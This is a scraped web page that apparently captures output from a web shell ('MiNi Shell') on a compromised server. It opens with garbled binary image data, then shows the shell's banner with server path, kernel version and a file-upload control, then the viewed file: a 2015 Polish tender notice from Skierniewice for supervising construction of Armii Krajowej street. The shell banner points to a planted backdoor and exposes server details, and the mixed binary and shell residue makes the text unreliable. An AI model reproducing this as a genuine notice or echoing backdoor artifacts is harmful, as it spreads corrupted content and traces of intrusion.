JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150813/208546-N-2015.html

<p class="kh_header"><b>Skierniewice: Pełnienie  nadzoru inwestorskiego  nad  realizacją  zadania pn: Budowa ul. Armii Krajowej (od ul. M. Skłodowskiej-Curie do ul. Nowobielańskiej)</b><br>
<b>Numer ogłoszenia: 208546 - 2015; data zamieszczenia: 13.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie  nadzoru inwestorskiego  nad  realizacją  zadania pn: Budowa ul. Armii Krajowej (od ul. M. Skłodowskiej-Curie do ul. Nowobielańskiej).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Nazwa i adres Zamawiającego:
Miasto Skierniewice, ul. Rynek 1, 96-100 Skierniewice, 
strona internetowa:  www.bip.skierniewice.pl
zwane dalej Zamawiającym, 

2.	Tryb udzielenia zamówienia:
Przetarg nieograniczony przeprowadzany jest na podstawie art. 39 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013r., poz. 907 z późn. zm.) zwaną dalej ustawą.

3. Opis przedmiotu zamówienia

Wspólny słownik zamówień: (CPV): 71.24.70.00-1- nadzór nad robotami budowlanymi.

3.1.Przedmiotem zamówienia jest Pełnienie  nadzoru inwestorskiego  nad  realizacją  zadania pn: Budowa ul. Armii Krajowej (od ul. M. Skłodowskiej-Curie do ul. Nowobielańskiej), które będzie zlecane do realizacji zgodnie     z ustawą Prawo zamówień publicznych - przewiduje się, że głównym trybem wyboru wykonawcy robót budowlanych jest przetarg nieograniczony. Nadzór inwestorski nad robotami budowlanymi w branżach: drogowej; sanitarno - wodociągowej i kanalizacyjnej;  elektrycznej; telekomunikacyjnej.
Zakres planowanych robót obejmuje:
Długość projektowanej drogi wynosi: droga główna około 979m (916,76 m wg opracowania Egis Poland na podstawie decyzji ZRID oraz 62m wg opracowania Urzędu Miasta Skierniewice na podstawie zgłoszenia do Prezydenta Miasta Skierniewice i do Wojewody Łódzkiego), pozostałe drogi objęte projektem konieczne do wybudowania , przebudowania w celu połączenia istniejących dróg z drogą projektowaną ok. 163m, przebudowa istniejących skrzyżowań.

Branża drogowa
Podstawowe parametry techniczno-użytkowe budowanej drogi:
.	kategoria drogi - droga powiatowa klasy Z, 1x2 pasy ruchu,
.	prędkość projektowa - V = 50 km/h (teren zabudowany),
.	kategoria ruchu - KR4,
.	nośność nawierzchni - 115 kN/oś,
.	nawierzchnia jezdni z betonu asfaltowego o zwiększonej odporności na odkształcania trwałe, o szerokości 7,0 m,
.	chodniki z kostki betonowej jedno i dwustronne o zmiennej  szerokości min. 1,50m ,
.	ścieżka rowerowa dwukierunkowa z kostki betonowej (bez fazy), o szerokości 2,0 m odsunięta od jezdni oraz w ciągu drogi serwisowej,
.	zatoka autobusowa wykonana z kostki granitowej o szerokości 3,00m,
.	droga serwisowa z kostki betonowej o szerokości 5,50m,
.	odwodnienie za pomocą kanalizacji deszczowej,
.	zjazdy indywidualne na posesje o szerokości min. 4,50m, wykonane z kostki betonowej,
.	zjazdy publiczne o szerokości 5,00m wykonane z kostki betonowej,
.	wykonanie zieleni.

Branża elektryczna
Oświetlenie uliczne.
.	Budowa, przebudowa istniejących linii oświetlenia ulicznego.
.	Przebudowa istniejących sieci energetycznych SN - 15kV.
.	Przebudowa istniejących linii energetycznych nN z przyłączami do istniejących budynków mieszkalnych.

Branża telekomunikacyjna
Zakres prac obejmuje:
.	budowę 6 studni telekomunikacyjnych magistralnych typu SKMP-3,
.	budowę 10 studni telekomunikacyjnych rozdzielczych typu SKR-2,
.	budowę 7 studni telekomunikacyjnych rozdzielczych typu SKR-1,
.	budowę kanalizacji telekomunikacyjnej pierwotnej na długości 661,0m,
.	przebudowę linii kablowych miedzianych na długości 2210,0m,
.	budowę kanalizacji telekomunikacyjnej wtórnej na długości 1720,0m, 
.	przebudowę 3 linii kablowych światłowodowych na długości 1880,0,
.	demontaż 2 studni telekomunikacyjnych typu SK-6,
.	demontaż 7 studni telekomunikacyjnych typu SK-2.

Branża sanitarna -  kanalizacja deszczowa i wodociąg
Kanalizacja deszczowa
.	budowa sieci kanalizacji deszczowej, odprowadzającej ścieki deszczowe z budowanej ul.Armii Krajowej, włączającej się do istniejącej kanalizacji deszczowej,
.	budowa sieci kanalizacji deszczowej, odprowadzającej ścieki deszczowe z budowanej ul.Armii Krajowej, włączającej się do istniejącego rowu melioracyjnego,
.	budowa wpustów deszczowych włączających się do projektowanych studni kanalizacyjnych zabudowanych na istniejących kolektorach,
.	budowa wpustów deszczowych włączających się do projektowanych studni kanalizacyjnych na projektowanym kolektorze,
.	budowa wylotu betonowego do istniejącego rowu melioracyjnego,
.	budowa pompowni ścieków deszczowych ,
.	regulacja istniejących studni kanalizacyjnych.

Wodociąg
Przebudowa obejmuje istniejącą sieć wodociągową o średnicach:  DN40mm, DN150mm, DN160mm, DN200mm, DN300mm.

Szczegółowy zakres robót dla tego zadania jest określony przez przedmiar robót i wykaz cen oraz dokumentację techniczną. Przy wykonywaniu robót należy uwzględnić także decyzje, warunki, uzgodnienia, opinie do opracowanej dokumentacji technicznej.

Szczegółowy opis robót budowlanych został zawarty w dokumentacjach projektowych na wykonanie zadania pn. Budowa ul. Armii Krajowej (od ul. M. Skłodowskiej-Curie do ul. Nowobielańskiej) oraz w Specyfikacjach Technicznych, które są dostępne w Wydziale Dróg i Komunikacji Urzędu Miasta Skierniewice przy ul. Floriana 9 w pokoju nr 12 oraz na stronie internetowej BIP UM Skierniewice.

3.2.  W ramach niniejszego zamówienia inspektor nadzoru zobowiązuje się  do:

3.2.1. 	Reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, specyfikacjami technicznymi, pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej,
3.2.2. 	Współpracy z projektantem, w tym do egzekwowania usunięcia ewentualnych usterek                 w dokumentacji projektowej,
3.2.3. 	Przygotowywanie, sporządzanie i dostarczanie dla Zamawiającego wszelkich informacji i opinii, dokumentów związanych z realizacją inwestycji w tym z zakresu rzeczowo-finansowego, a także bieżącej kontroli zgodności wykonywanych prac z harmonogramem rzeczowo-finansowym robót
3.2.4. 	Podejmowania działań w celu dotrzymania terminu realizacji budowy,
3.2.5. 	Nadzorowanie wypełniania warunków umowy zawartej pomiędzy zamawiającym a wykonawcą robót,
3.2.6. 	Podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, materiałów, prefabrykatów - w tym mieszanek mineralno-bitumicznych, betonów do wszystkich elementów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy, normy i wymagania sformułowane w umowie z wykonawcą robót, w dokumentacji projektowej i specyfikacjach technicznych,
3.2.7. 	Przeprowadzania kontroli laboratorium wykonawcy w celu sprawdzenia, czy stosowane urządzenia pomiarowe i sprzęt laboratoryjny wykonawcy posiadają ważną legalizację, zostały prawidłowo wykalibrowanie i odpowiadają wymogom norm określających procedurę badań, uczestniczenia w badaniach przeprowadzanych w tym laboratorium przez wykonawcę w czasie trwania budowy,
3.2.8. 	Zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie                   z warunkami umów i dokumentacją projektową dla wszystkich asortymentów robót,
3.2.9. 	Sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych,                        a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania w budownictwie, kontroli i archiwizacji dokumentów potwierdzających dopuszczenie tych materiałów do obrotu,
3.2.10. 	Sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia 	w próbach i odbiorach technicznych sieci i urządzeń technicznych,
3.2.11. Wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, 	także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz  dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do 	obrotu     i stosowania     w budownictwie wyrobów budowlanych i urządzeń technicznych,
3.2.12. 	Żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót,
3.2.13. Kontrolowania jakości i terminowości wykonywanych robót:
-	kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót,
-	uczestniczenie w dokonywaniu odbiorów częściowych inwestycji,
-	przygotowanie zadania inwestycyjnego do odbioru końcowego - sprawdzenie i zatwierdzenie dokumentacji powykonawczej (operatu kolaudacyjnego), w tym powykonawczej dokumentacji geodezyjnej,
-	sprawdzanie faktur wykonawcy oraz dokumentów załączonych do rozliczenia robót,
-	dokonywanie rozliczeń merytorycznych i finansowych wykonanych prac w imieniu Zamawiającego, a także sporządzenie pełnego rozliczenia finansowego nadzorowanej inwestycji,
-	dokonanie odbioru inwestycji po upływie terminu gwarancji ustalonego w umowie z wykonawcą robót budowlanych,
-	uczestnictwo w komisjach do stwierdzenia ewentualnych wad w okresie rękojmi oraz nadzór nad naprawami wad ujawnionych w okresie rękojmi i gwarancji.
3.2.14. 	Inspektor nadzoru zobowiązany jest do składania sprawozdań z realizacji inwestycji na wniosek 	zamawiającego oraz będzie informował na bieżąco  Zamawiającego o przebiegu prac  	ewentualnych zagrożeniach w realizacji inwestycji,
3.2.15. 	Inspektor nadzoru zobowiązany jest do nadzorowania budowy w takich odstępach czasu, aby 		była skuteczność nadzoru ,jednak nie rzadziej niż min. 3 razy w tygodniu oraz na każde żądanie 	Zamawiającego - Inwestora w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora 	nadzoru będzie nieodzowna najpóźniej w przeciągu 3 godzin,
Każdorazowy pobyt na placu budowy winien być potwierdzony wpisem do dziennika budowy.
3.2.16. 	Inspektor nadzoru zobowiązany jest posiadać telefon komórkowy i samochód do dyspozycji.

Pełen zakres czynności określonych w Ustawie z dnia 7 lipca 1994 roku Prawo budowlane - (tekst jednolity Dz.U. z 2013r.  Poz. 1409 z późn.zm.) .
Pełnienie funkcji koordynatora inspektorów nadzoru w przypadku występowania innych branż przy realizacji inwestycji - zgodnie z art. 27 w/w ustawy Prawo budowlane.

4.  Termin wykonania zamówienia

Zamówienie będzie wykonywane w okresie od podpisania umowy w sprawie pełnienia nadzoru inwestorskiego oraz złożenia oświadczenia o podjęciu nadzoru inwestorskiego do zakończenia robót, przez które rozumie się łączne spełnienie następujących warunków: dokonanie przez Inwestora odbioru końcowego, rozliczenie robót fakturą końcową.
Inspektor nadzoru jest tez zobowiązany do wzięcia udziału w odbiorach pogwarancyjnych.
Przewidywany termin zakończenia robót budowlanych - 30 października 2016r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do udzielonego zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt 6 ustawy Pzp, polegających na zwiększeniu zakresu wykonywanych czynności nadzoru inwestorskiego, będących wynikiem zwiększenia zakresów nadzorowanych robót  budowlanych .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. 	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości :                  3 000,00 zł (słownie: trzy tysiące  zł),
2. 	Wadium powinno być wniesione przed upływem terminu składania ofert. Za skuteczne wniesienie wadium w pieniądzu zamawiający uważa wadium, które do terminu składania ofert włącznie, znajdzie się na koncie zamawiającego. Chwilą wpłaty wadium jest chwila wpływu na konto zamawiającego, a nie data złożenia przelewu.
3. 	Wadium może być wniesione w formach przewidzianych w art. 45. ust. 6 ustawy Pzp.,
4. 	Wadium w pieniądzu należy wpłacić na rachunek bankowy o nr konta: Powszechna Kasa Oszczędności Bank Polski SA nr 81 1020 3352 0000 1402 0193 3969 z dopiskiem RZP - wadium do przetargu pn. Pełnienie  nadzoru inwestorskiego  nad  realizacją  zadania pn:   Budowa ul. Armii Krajowej (od ul. M. Skłodowskiej-Curie do ul. Nowobielańskiej)
5. 	Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym i jego zwrot nastąpi zgodnie z art.46 ust. 4 ustawy Pzp.,
6. 	Wadium w innych dopuszczonych formach należy wnieść w kasie Urzędu Miasta Skierniewice,
7. 	Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 ustawy Pzp.,
8. 	Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46 ust. 4a
i 5 ustawy Pzp.,
9. 	Wadium należy wnieść na okres związania ofertą,
10.Dowód wniesienia wadium należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
spełniają warunki określone w art. 22 ust. 1 pkt 1-4 ustawy, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich     posiadania, 
Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust.1 pkt 1 ustawy, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie stanowiące załącznik nr 5 do SIWZ.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust 1 i 2a  ustawy Pzp,
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w SIWZ oraz dostarczą oświadczenia i dokumenty wymagane przez Zamawiającego.
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt 2 ustawy, dotyczący posiadania wiedzy i doświadczenia za spełniony, jeżeli wykonawca wykaże co najmniej dwie usługi polegające na sprawowaniu nadzoru nad robotami budowlanymi polegającymi na przebudowie, rozbudowie lub budowie drogi wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat i podmiotów na rzecz których usługa została wykonana o wartości  nie mniejszej niż 140 000,00 zł brutto (słownie: sto czterdzieści tysięcy zł) a wartość robót budowlanych wynosiła nie mniej niż 9 000 000,00  zł (słownie: dziewięć milionów złotych) brutto każda, podobne z rodzaju do przedmiotu zamówienia z jednoczesnym pisemnym potwierdzeniem należytego wykonania tych robót , bądź innych dokumentów równoważnych -  zgodnie z załącznikiem nr 6. 
Za usługi podobne z rodzaju do przedmiotu zamówienia uznaje się pełnienie nadzoru inwestorskiego nad wykonaniem budowy, rozbudowy, przebudowy drogi o wartości min. 9 000 000,00 zł brutto.
Na dowód tego wykonawca do oferty winien załączyć: 
Wykaz wykonanych lub wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie co najmniej dwóch usług polegających na sprawowaniu nadzoru nad robotami budowlanymi polegającymi na przebudowie, rozbudowie lub budowie drogi  o wartości nie mniejszej niż 140 000,00 zł - brutto ( słownie : sto czterdzieści  tysięcy złotych), a wartość  robót budowlanych wynosiła nie mniej niż  9 000 000,00 zł (słownie: dziewięć  milionów  złotych) brutto, podobnych  z rodzaju do przedmiotu zamówienia   -  zgodnie z załącznikiem nr 6.
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia Wykonawcy zgodnie z załącznikiem nr 2 do SIWZ. Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie osób zdolnych do wykonania zamówienia wymagane jest wykazanie osoby lub osób  posiadających uprawnienia do kierowania i nadzorowania robotami budowlanymi                        w specjalnościach:
-	drogowej - koordynator,
-	sanitarnej - wodociągowej i kanalizacyjnej,
-	elektrycznej w zakresie budowy sieci,
-	telekomunikacyjnej w zakresie budowy sieci,
Na dowód tego wykonawca winien załączyć do oferty: Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 4.
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek określony w art. 22 ust. 1 pkt 4 ustawy Pzp, dotyczący sytuacji ekonomicznej i finansowej za spełniony, jeżeli Wykonawca przedstawi opłaconą polisę OC w zakresie prowadzonej działalności, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia w wysokości minimum   140 000,00  zł (słownie: sto czterdzieści tysięcy złotych)
Zamawiający wymagał będzie przed podpisaniem umowy przedłożenia polisy OC o wartości minimum wartości umowy. Na dowód tego do oferty należy załączyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na co najmniej 140 000,00 zł (słownie: sto czterdzieści tysięcy złotych). Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

